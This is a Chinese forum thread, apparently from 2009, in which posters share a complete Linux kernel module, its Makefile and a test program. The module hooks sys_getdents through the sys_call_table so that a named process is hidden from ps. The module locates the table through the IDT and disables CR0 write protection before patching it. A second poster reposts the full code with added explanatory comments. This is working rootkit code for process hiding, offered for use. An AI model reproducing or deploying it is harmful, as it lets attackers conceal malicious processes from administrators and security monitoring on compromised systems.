[原创]关于劫持系统调用隐藏进程的一些心得

g84ch

网上很多类似的文章,其中很多示例程序都是在比较老的内核版本上测试过,很多在新的内核下根本无法运行,我收集了一些相关的资料,并给出一个在linux内核2.6.28(ubuntu9.04)上可以运行的程序代码.相比其他一些文章,修改如下:

1.增加了两个函数,清CR0的第20位,不然在替换sys_call_table的时候会报段错误.
unsigned int clear_and_return_cr0(void);
void setback_cr0(unsigned int val);

2.针对ubuntu9.04中,ps命令用的系统调用是sys_getdents,不是sys_getdents64(在suse系统里面用的是sys_getdents64),所以程序中劫持的是sys_getdents的系统调用.

关于隐藏进程的原理,可以查看其他相关文章,主要是通过int 0x80 找sys_call_table的地址.

博客地址:http://blog.chinaunix.net/u3/103654/showart.php?id=2053976

测试环境: ubuntu9.04 内核版本2.6.28

模块代码如下:

/*hideps.c*/

#include <linux/module.h>
#include <linux/kernel.h>
#include <asm/unistd.h>
#include <linux/types.h>
#include <linux/sched.h>
#include <linux/dirent.h>
#include <linux/string.h>
#include <linux/file.h>
#include <linux/fs.h>
#include <linux/list.h>
#include <asm/uaccess.h>
#include <linux/unistd.h>
//#include <sys/stat.h>
//#include <fcntl.h>
#define CALLOFF 100

//使用模块参数来定义需要隐藏的进程名

int orig_cr0;
char psname[10]="looptest";
char *processname=psname;

//module_param(processname, charp, 0);
struct {
    unsigned short limit;
    unsigned int base;
} __attribute__ ((packed)) idtr;

struct {
    unsigned short off1;
    unsigned short sel;
    unsigned char none,flags;
    unsigned short off2;
} __attribute__ ((packed)) * idt;

struct linux_dirent{
    unsigned long     d_ino;
    unsigned long     d_off;
    unsigned short    d_reclen;
    char    d_name[1];
};

void** sys_call_table;

unsigned int clear_and_return_cr0(void)
{
    unsigned int cr0 = 0;
    unsigned int ret;

    asm volatile ("movl %%cr0, %%eax"
            : "=a"(cr0)
         );
    ret = cr0;

    /*clear the 20th bit of CR0,*/
    cr0 &= 0xfffeffff;
    asm volatile ("movl %%eax, %%cr0"
            :
            : "a"(cr0)
         );
    return ret;
}

void setback_cr0(unsigned int val)
{
    asm volatile ("movl %%eax, %%cr0"
            :
            : "a"(val)
         );
}


asmlinkage long (*orig_getdents)(unsigned int fd,
                    struct linux_dirent __user *dirp, unsigned int count);

char * findoffset(char *start)
{
    char *p;
    for (p = start; p < start + CALLOFF; p++)
    if (*(p + 0) == '\xff' && *(p + 1) == '\x14' && *(p + 2) == '\x85')
        return p;
    return NULL;
}

int myatoi(char *str)
{
    int res = 0;
    int mul = 1;
    char *ptr;
    for (ptr = str + strlen(str) - 1; ptr >= str; ptr--)
    {
        if (*ptr < '0' || *ptr > '9')
            return (-1);
        res += (*ptr - '0') * mul;
        mul *= 10;
    }
    if(res>0 && res< 9999)
        printk(KERN_INFO "pid=%d,",res);
    printk("\n");
    return (res);
}

struct task_struct *get_task(pid_t pid)
{
    struct task_struct *p = get_current(),*entry=NULL;
    list_for_each_entry(entry,&(p->tasks),tasks)
    {
        if(entry->pid == pid)
        {
            printk("pid found=%d\n",entry->pid);
            return entry;
        }
        else
        {
    //    printk(KERN_INFO "pid=%d not found\n",pid);
        }
    }
    return NULL;
}

static inline char *get_name(struct task_struct *p, char *buf)
{
    int i;
    char *name;
    name = p->comm;
    i = sizeof(p->comm);
    do {
        unsigned char c = *name;
        name++;
        i--;
        *buf = c;
        if (!c)
            break;
        if (c == '\\') {
            buf[1] = c;
            buf += 2;
            continue;
        }
        if (c == '\n')
        {
            buf[0] = '\\';
            buf[1] = 'n';
            buf += 2;
            continue;
        }
        buf++;
    }
    while (i);
    *buf = '\n';
    return buf + 1;
}

int get_process(pid_t pid)
{
    struct task_struct *task = get_task(pid);
    //    char *buffer[64] = {0};
    char buffer[64];
    if (task)
    {
        get_name(task, buffer);
    //    if(pid>0 && pid<9999)
    //    printk(KERN_INFO "task name=%s\n",*buffer);
        if(strstr(buffer,processname))
            return 1;
        else
            return 0;
    }
    else
        return 0;
}

asmlinkage long hacked_getdents(unsigned int fd,
                    struct linux_dirent __user *dirp, unsigned int count)
{
    //added by lsc for process
    long value;
    //    struct inode *dinode;
    unsigned short len = 0;
    unsigned short tlen = 0;
//    struct linux_dirent *mydir = NULL;
//end
    //在这里调用一下sys_getdents,得到返回的结果
    value = (*orig_getdents) (fd, dirp, count);
    tlen = value;
    //遍历得到的目录列表
    while(tlen > 0)
    {
        len = dirp->d_reclen;
        tlen = tlen - len;
        printk("%s\n",dirp->d_name);
                              
        if(get_process(myatoi(dirp->d_name)) )
        {
            printk("find process\n");
        //发现匹配的进程，调用memmove将这条进程覆盖掉
            memmove(dirp, (char *) dirp + dirp->d_reclen, tlen);
            value = value - len;
            printk(KERN_INFO "hide successful.\n");
        }
        if(tlen)
            dirp = (struct linux_dirent *) ((char *)dirp + dirp->d_reclen);
    }
    printk(KERN_INFO "finished hacked_getdents.\n");
    return value;
}


void **get_sct_addr(void)
{
    unsigned sys_call_off;
    unsigned sct = 0;
    char *p;
    asm("sidt %0":"=m"(idtr));
    idt = (void *) (idtr.base + 8 * 0x80);
    sys_call_off = (idt->off2 << 16) | idt->off1;
    if ((p = findoffset((char *) sys_call_off)))
        sct = *(unsigned *) (p + 3);
    return ((void **)sct);
}


static int filter_init(void)
{
    //得到sys_call_table的偏移地址
    sys_call_table = get_sct_addr();
    if (!sys_call_table)
    {
        printk("get_act_addr(): NULL...\n");
        return 0;
    }
    else
        printk("sct: 0x%x\n", (unsigned int)sys_call_table);
    //将sys_call_table中注册的系统调用sys_getdents替换成我们自己的函数hack_getdents
    orig_getdents = sys_call_table[__NR_getdents];

    orig_cr0 = clear_and_return_cr0();
    sys_call_table[__NR_getdents] = hacked_getdents;
    setback_cr0(orig_cr0);
    printk(KERN_INFO "hideps: module loaded.\n");
                return 0;
}


static void filter_exit(void)
{
    orig_cr0 = clear_and_return_cr0();
    if (sys_call_table)
    sys_call_table[__NR_getdents] = orig_getdents;
    setback_cr0(orig_cr0);
    printk(KERN_INFO "hideps: module removed\n");
}
module_init(filter_init);
module_exit(filter_exit);
MODULE_LICENSE("GPL");

makefile文件如下:

obj-m   :=hideps.o
EXTRA_CFLAGS := -Dsymname=sys_call_table
KDIR   := /lib/modules/$(shell uname -r)/build
PWD   := $(shell pwd)
default:
        $(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules
clean:
        $(RM) -rf .*.cmd *.mod.c *.o *.ko .tmp*


编写一个测试程序looptest.c,如下:
#include<stdio.h>

int main(void)
{
    while(1);
    return 0;
}

编译该测试程序,#gcc looptest.c -o looptest
并将该程序在后台运行,然后insmod 驱动模块hideps.ko,然后输入ps查看进程,可发现,looptest进程看不到了....

[ 本帖最后由 g84ch 于 2009-9-17 10:07 编辑 ]

Godbach

好文章。不知LZ的这个程序和内核版本关联紧密否，手头上只有2.6.18的内核。

CUDev

可以看一下这个:
http://blog.chinaunix.net/u/12592/showart_1903466.html

g84ch

2.6.18?是redhat的release吧,呵呵,应该是可以的,不过红帽中对ps的系统调用是sys_getdents还是sys_getdents64,这我没有去看,在ubuntu9.04中用的是sys_getdents,所以我程序里面劫持的它.

g84ch

代码的那个文件下载了是乱码,你能传个附件到这里来吗?谢谢...呵呵...

Godbach

对，RH发行了2.6.18的内核版本，不过我自己也从kernel.org上下载了干净的2.6.18.3的内核，现在玩的就自己下载的

CUDev

strace一下，看是哪个系统调用

ninver

我觉得两点可以改系统调用  一 在lib库里可以改动系统用 二 在call.s可以改 至于调用的函数你可以自己定义

CUDev

cublog的附件处理将tar.gz全部改为了.tgz后缀，可能会导致解压的时候直解压到tar文件。再对tar文件解压即可。
或者是tar xzvf xxxx.tgz

chenbdchenbd

好贴，支持。utu:" />


追加了点注释。

1. /*hideps.c*/
   
2. 
   
3. #include <linux/module.h>
   
4. #include <linux/kernel.h>
   
5. #include <asm/unistd.h>
   
6. #include <linux/types.h>
   
7. #include <linux/sched.h>
   
8. #include <linux/dirent.h>
   
9. #include <linux/string.h>
   
10. #include <linux/file.h>
    
11. #include <linux/fs.h>
    
12. #include <linux/list.h>
    
13. #include <asm/uaccess.h>
    
14. #include <linux/unistd.h>
    
15. //#include <sys/stat.h>
    
16. //#include <fcntl.h>
    
17. 
    
18. #define CALLOFF 100
    
19. 
    
20. //使用模块参数来定义需要隐藏的进程名
    
21. 
    
22. int orig_cr0;
    
23. char psname[10] = "looptest";
    
24. char *processname = psname;
    
25. 
    
26. //module_param(processname, charp, 0);
    
27. 
    
28. // idtr register
    
29. struct {
    
30.     unsigned short limit;// 16 bit(bit0-15)
    
31.     unsigned int base;    // 32 bit(bit16-47)
    
32. } __attribute__ ((packed)) idtr;
    
33. 
    
34. // idt entity(8byte)
    
35. struct {
    
36.     unsigned short off1; // offset bit0-15(bit0-15)
    
37.     unsigned short sel; //segment selector (bit16-31)
    
38.     unsigned char none,flags; //none:(bit32-39), flag:(bit40-47)
    
39.     unsigned short off2; //offset bit16-31(bit48-63)
    
40. } __attribute__ ((packed)) * idt;
    
41. 
    
42. struct linux_dirent{
    
43.     unsigned long     d_ino;
    
44.     unsigned long     d_off;
    
45.     unsigned short    d_reclen;
    
46.     char    d_name[1];
    
47. };
    
48. 
    
49. void** sys_call_table;
    
50. 
    
51. //clear bit19(20th bit) of cr0 and return original cr0
    
52. unsigned int clear_and_return_cr0(void)
    
53. {
    
54.     unsigned int cr0 = 0;
    
55.     unsigned int ret;
    
56. 
    
57.     asm volatile ("movl %%cr0, %%eax"
    
58.             : "=a"(cr0)
    
59.          );
    
60.     ret = cr0;
    
61. 
    
62.     /*clear the 20th bit of CR0,*/
    
63.     cr0 &= 0xfffeffff;
    
64.     asm volatile ("movl %%eax, %%cr0"
    
65.             :
    
66.             : "a"(cr0)
    
67.          );
    
68.     return ret;
    
69. }
    
70. 
    
71. // restore cr0 with original value
    
72. void setback_cr0(unsigned int val)
    
73. {
    
74.     asm volatile ("movl %%eax, %%cr0"
    
75.             :
    
76.             : "a"(val)
    
77.          );
    
78. }
    
79. 
    
80. // original system call func
    
81. asmlinkage long (*orig_getdents)(unsigned int fd,
    
82.                     struct linux_dirent __user *dirp, unsigned int count);
    
83. 
    
84. // get addr start with 0xff 0x14 0x85
    
85. char * findoffset(char *start)
    
86. {
    
87.     char *p;
    
88.     for (p = start; p < start + CALLOFF; p++)
    
89.         // In x86 machine code,   call *sys_call_table(,%eax,4)
    
90.         // is translated to   0xff 0x14 0x85 <addr4> <addr3> <addr2> <addr1>
    
91.         // the 4 ‘addr’ bytes form the address of 'sys_call_table[]'
    
92.         if (*(p + 0) == '\xff' && *(p + 1) == '\x14' && *(p + 2) == '\x85')
    
93.             return p;
    
94.     return NULL;
    
95. }
    
96. 
    
97. // convert a digital string to int
    
98. int myatoi(char *str)
    
99. {
    
100.     int res = 0;
     
101.     int mul = 1;
     
102.     char *ptr;
     
103.     for (ptr = str + strlen(str) - 1; ptr >= str; ptr--)
     
104.     {
     
105.         // not digit
     
106.         if (*ptr < '0' || *ptr > '9')
     
107.             return (-1);
     
108.         res += (*ptr - '0') * mul;
     
109.         mul *= 10;
     
110.     }
     
111.     if(res>0 && res< 9999)
     
112.         printk(KERN_INFO "pid=%d,",res);
     
113.     printk("\n");
     
114.     return (res);
     
115. }
     
116. 
     
117. // get task_struct by pid
     
118. struct task_struct *get_task(pid_t pid)
     
119. {
     
120.     struct task_struct *p = get_current(),*entry=NULL;
     
121.     list_for_each_entry(entry,&(p->tasks),tasks)
     
122.     {
     
123.         if(entry->pid == pid)
     
124.         {
     
125.             printk("pid found=%d\n",entry->pid);
     
126.             return entry;
     
127.         }
     
128.     }
     
129.     printk(KERN_INFO "pid=%d not found\n",pid);
     
130.     return NULL;
     
131. }
     
132. 
     
133. // get task's name
     
134. static inline char *get_name(struct task_struct *p, char *buf)
     
135. {
     
136.     int i;
     
137.     char *name;
     
138.     name = p->comm;
     
139.     i = sizeof(p->comm);
     
140.     do {
     
141.         unsigned char c = *name;
     
142.         name++;
     
143.         i--;
     
144.         *buf = c;
     
145.         if (!c)
     
146.             break;
     
147.         if (c == '\\') {
     
148.             buf[1] = c;
     
149.             buf += 2;
     
150.             continue;
     
151.         }
     
152.         if (c == '\n')
     
153.         {
     
154.             buf[0] = '\\';
     
155.             buf[1] = 'n';
     
156.             buf += 2;
     
157.             continue;
     
158.         }
     
159.         buf++;
     
160.     }
     
161.     while (i);
     
162.     *buf = '\n';
     
163.     return buf + 1;
     
164. }
     
165. 
     
166. // check if pid is which we want to hook
     
167. int get_process(pid_t pid)
     
168. {
     
169.     struct task_struct *task = get_task(pid);
     
170.     //    char *buffer[64] = {0};
     
171.     char buffer[64];
     
172.     if (task)
     
173.     {
     
174.         get_name(task, buffer);
     
175.     //    if(pid>0 && pid<9999)
     
176.     //    printk(KERN_INFO "task name=%s\n",*buffer);
     
177.         if(strstr(buffer,processname))
     
178.             return 1;
     
179.         else
     
180.             return 0;
     
181.     }
     
182.     else
     
183.         return 0;
     
184. }
     
185. 
     
186. //hook func
     
187. asmlinkage long hacked_getdents(unsigned int fd,
     
188.                     struct linux_dirent __user *dirp, unsigned int count)
     
189. {
     
190. //added by lsc for process
     
191.     long value;
     
192.     //    struct inode *dinode;
     
193.     unsigned short len = 0;
     
194.     unsigned short tlen = 0;
     
195. //    struct linux_dirent *mydir = NULL;
     
196. //end
     
197.     //在这里调用一下sys_getdents,得到返回的结果
     
198.     value = (*orig_getdents) (fd, dirp, count);
     
199.     tlen = value;
     
200.     //遍历得到的目录列表
     
201.     while(tlen > 0)
     
202.     {
     
203.         len = dirp->d_reclen;
     
204.         tlen = tlen - len;
     
205.         printk("%s\n",dirp->d_name);
     
206.                               
     
207.         if(get_process(myatoi(dirp->d_name)) )
     
208.         {
     
209.             printk("find process\n");
     
210.             //发现匹配的进程，调用memmove将这条进程覆盖掉
     
211.             memmove(dirp, (char *) dirp + dirp->d_reclen, tlen);
     
212.             value = value - len;
     
213.             printk(KERN_INFO "hide successful.\n");
     
214.         }
     
215.         if(tlen)
     
216.             dirp = (struct linux_dirent *) ((char *)dirp + dirp->d_reclen);
     
217.     }
     
218.     printk(KERN_INFO "finished hacked_getdents.\n");
     
219.     return value;
     
220. }
     
221. 
     
222. 
     
223. void **get_sct_addr(void)
     
224. {
     
225.     unsigned sys_call_off;
     
226.     unsigned sct = 0;
     
227.     char *p;
     
228. 
     
229.     // get idtr using sidt
     
230.     asm("sidt %0":"=m"(idtr));
     
231. 
     
232.     // get system_call idt
     
233.     idt = (void *) (idtr.base + 8 * 0x80);
     
234. 
     
235.     // get offset(address of system_call func)
     
236.     sys_call_off = (idt->off2 << 16) | idt->off1;
     
237. 
     
238.     // get call *sys_call_table(,%eax,4)
     
239.     if ((p = findoffset((char *) sys_call_off)))
     
240.         // add   0xff 0x14 0x85 3bytes
     
241.         sct = *(unsigned *) (p + 3);
     
242.     // sys_call_table
     
243.     return ((void **)sct);
     
244. }
     
245. 
     
246. 
     
247. static int filter_init(void)
     
248. {
     
249.     //得到sys_call_table的偏移地址
     
250.     sys_call_table = get_sct_addr();
     
251.     if (!sys_call_table)
     
252.     {
     
253.         printk("get_act_addr(): NULL...\n");
     
254.         return 0;
     
255.     }
     
256.     else
     
257.         printk("sct: 0x%x\n", (unsigned int)sys_call_table);
     
258.     //将sys_call_table中注册的系统调用sys_getdents替换成我们自己的函数hack_getdents
     
259.     orig_getdents = sys_call_table[__NR_getdents];
     
260. 
     
261.     orig_cr0 = clear_and_return_cr0();
     
262.     sys_call_table[__NR_getdents] = hacked_getdents;
     
263.     setback_cr0(orig_cr0);
     
264.     printk(KERN_INFO "hideps: module loaded.\n");
     
265.     return 0;
     
266. }
     
267. 
     
268. 
     
269. static void filter_exit(void)
     
270. {
     
271.     orig_cr0 = clear_and_return_cr0();
     
272.     if (sys_call_table)
     
273.     sys_call_table[__NR_getdents] = orig_getdents;
     
274.     setback_cr0(orig_cr0);
     
275.     printk(KERN_INFO "hideps: module removed\n");
     
276. }
     
277. module_init(filter_init);
     
278. module_exit(filter_exit);
     
279. MODULE_LICENSE("GPL");

复制代码

[ 本帖最后由 chenbdchenbd 于 2009-9-17 18:43 编辑 ]